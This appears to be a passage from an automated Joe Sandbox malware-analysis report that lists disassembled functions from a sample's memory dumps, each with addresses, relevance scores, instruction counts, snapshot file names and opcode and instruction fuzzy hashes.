                                                                                                                                                                                                                                                  Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: m
                                                                                                                                                                                                                                                  • API String ID: 0-3775001192
                                                                                                                                                                                                                                                  • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                  • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                  Function 0075C921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                                  • API String ID: 0-1505114982
                                                                                                                                                                                                                                                  • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                  • Instruction ID: 217627db1edf27fd5545ff56fa9707f1dfd5154e33cda08a6ea78736819c648c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6C135B1D003168FCB25CF28C8526BBB7B1FF95311F19821DD895AB790E778A845CB90
                                                                                                                                                                                                                                                  Function 00765BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 167H
                                                                                                                                                                                                                                                  • API String ID: 0-2704650348
                                                                                                                                                                                                                                                  • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                  • Instruction ID: 88feff6c70889bcb80c9caefbb4b57c875c58fe78bb28bbf3a723160d4644e98
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3D136726047458BDB14CF28CC816ABB792EFD5314F19863CED968B3C1E7399E05A782
                                                                                                                                                                                                                                                  Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 167H
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                  • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                  • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                  Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                                  • API String ID: 0-1505114982
                                                                                                                                                                                                                                                  • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                  • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                  Function 00428BE9 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                  • Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59
                                                                                                                                                                                                                                                  Function 00761F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &#
                                                                                                                                                                                                                                                  • API String ID: 0-1789715784
                                                                                                                                                                                                                                                  • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                  • Instruction ID: bebbe492ecab8a74a5885d0614063349e3a0f03425f5b8dac776dbe2713199bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62A117626046109BDB589B28CC5267BB3E5EF91320F09852CFC979B392E73CED06C756
                                                                                                                                                                                                                                                  Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &#
                                                                                                                                                                                                                                                  • API String ID: 0-1789715784
                                                                                                                                                                                                                                                  • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                  • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                  Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                                  • API String ID: 0-1505114982
                                                                                                                                                                                                                                                  • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                  • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                  Function 007483C7 Relevance: 1.6, Strings: 1, Instructions: 399COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: -
                                                                                                                                                                                                                                                  • API String ID: 0-2547889144
                                                                                                                                                                                                                                                  • Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                  • Instruction ID: dd0cfb55c498359ce7b38fb96c9cfdda44d2e34ce4377cec7edcaa0ea8bb6f49
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77D11F31A083898BC759CE29C8D026EBBE2EFD1320F19861DE5E5573D5DB3C99458B83
                                                                                                                                                                                                                                                  Function 0075C528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: de
                                                                                                                                                                                                                                                  • API String ID: 0-2106599819
                                                                                                                                                                                                                                                  • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                  • Instruction ID: eb619f8e66464c1dfa33c337ec74eabb11d882e233b758db4593ae22983a3eeb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C913571908310CAC314DF68C8927ABB7F2EF95325F18992CE8D64B791F7B89509C792
                                                                                                                                                                                                                                                  Function 0075D4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ~
                                                                                                                                                                                                                                                  • API String ID: 0-1707062198
                                                                                                                                                                                                                                                  • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                  • Instruction ID: 4cf510951e8dcf6647c878b1632a5e0379ac1a3dc362526237014ff06e57e055
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFA13632A042654FCB35CE288C806AAB7E1AF95324F19C67DECA9973D1D7758C0AD7C1
                                                                                                                                                                                                                                                  Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ~
                                                                                                                                                                                                                                                  • API String ID: 0-1707062198
                                                                                                                                                                                                                                                  • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                  • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                  Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: RpB
                                                                                                                                                                                                                                                  • API String ID: 0-664042118
                                                                                                                                                                                                                                                  • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                  • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                  Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: d1
                                                                                                                                                                                                                                                  • API String ID: 0-4211392460
                                                                                                                                                                                                                                                  • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                  • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                  Function 0077DA97 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: cdef
                                                                                                                                                                                                                                                  • API String ID: 0-4216504194
                                                                                                                                                                                                                                                  • Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                  • Instruction ID: d24ce4919dacccf971dc5ef0b464f46690b012e9156a5b810524cc6e703681d2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30815471A083508FCB25CF24C89196BBBB1EFD6364F19CA2CE9C957291D735AC01C792
                                                                                                                                                                                                                                                  Function 0043D830 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: cdef
                                                                                                                                                                                                                                                  • API String ID: 2994545307-4216504194
                                                                                                                                                                                                                                                  • Opcode ID: d9e8f1ee42311986f1eec1db1d15d5cb27079d05f35c354e80ab23b15ff2b9d0
                                                                                                                                                                                                                                                  • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9e8f1ee42311986f1eec1db1d15d5cb27079d05f35c354e80ab23b15ff2b9d0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                                                                                                                                                                                                                  Function 0075734A Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                                  • API String ID: 0-1553575800
                                                                                                                                                                                                                                                  • Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                  • Instruction ID: 0a09657688af5dc82ca2e8250016d9d697d5049b48c2449d20f23ca9eb4e3b92
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9691F371614B428FD318CF38C891BA6B7D2EB86314F18C57DD49A8B7A6DA78A442C740
                                                                                                                                                                                                                                                  Function 007577E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: c$
                                                                                                                                                                                                                                                  • API String ID: 0-2516980088
                                                                                                                                                                                                                                                  • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                  • Instruction ID: 56166a7bb80870b570cb5b9bd6e49c920da2036a410139dacbcc6745cca557b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35919BB4104741CFD7648F25C4A4BA3BBB1FF46315F15958CC8864FBA1D3B9A84ACB94
                                                                                                                                                                                                                                                  Function 0076B393 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Fg
                                                                                                                                                                                                                                                  • API String ID: 0-875302535
                                                                                                                                                                                                                                                  • Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                  • Instruction ID: 1d97553688d1961c82a07904fd1b3a949d5b206e6648d49bb10f52e4d63c296e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA81D67121D3808BD7698F25C8657FBBBD3EBD2304F18896DC5CA87292DB38444ACB16
                                                                                                                                                                                                                                                  Function 0042B12C Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
